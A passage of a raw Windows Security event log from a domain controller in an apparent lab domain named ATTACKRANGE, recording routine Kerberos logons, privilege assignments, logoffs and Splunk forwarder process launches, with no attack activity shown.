Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-DC-209$
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x74A49B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {52856D24-E7E4-800D-C1D5-890AF5C2B413}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 02:21:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263705
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: ATTACKRANGE\WIN-DC-209$
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x74A49B
Privileges: SeAuditPrivilege
SeImpersonatePrivilege
SeAssignPrimaryTokenPrivilege
04/19/2021 02:21:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263704
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x74A31D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:21:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263707
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x749DA9
Logon Type: 3
04/19/2021 02:21:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263708
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x74A3CC
Logon Type: 3
04/19/2021 02:21:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263711
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x74B140
Logon Type: 3
04/19/2021 02:21:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263710
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x74B140
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51437
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 02:21:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263709
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x74B140
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:22:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263713
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1aac
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:22:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263712
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xee0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
04/19/2021 02:22:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263714
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13fc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
04/19/2021 02:22:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263715
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b54
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
04/19/2021 02:22:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263716
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bf4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 02:22:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263718
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xa94
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
04/19/2021 02:22:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263717
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1660
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
04/19/2021 02:22:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263724
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x74E148
Logon Type: 3
04/19/2021 02:22:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263723
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x74E148
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51446
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 02:22:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263722
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x74E148
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:22:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263721
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x74E0DC
Logon Type: 3
04/19/2021 02:22:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263720
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x74E0DC
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51445
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:22:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263719
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x74E0DC
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:22:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263725
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x74A304
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:22:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263728
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x74EE51
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:22:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263727
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x74EE51
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51455
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:22:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263726
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x74EE51
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:23:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263729
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xb00
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:23:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263731
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1540
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:23:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263730
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xc58
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:23:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263732
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf90
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:23:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263733
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1380
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:23:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263735
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xb90
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:23:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263734
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x530
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
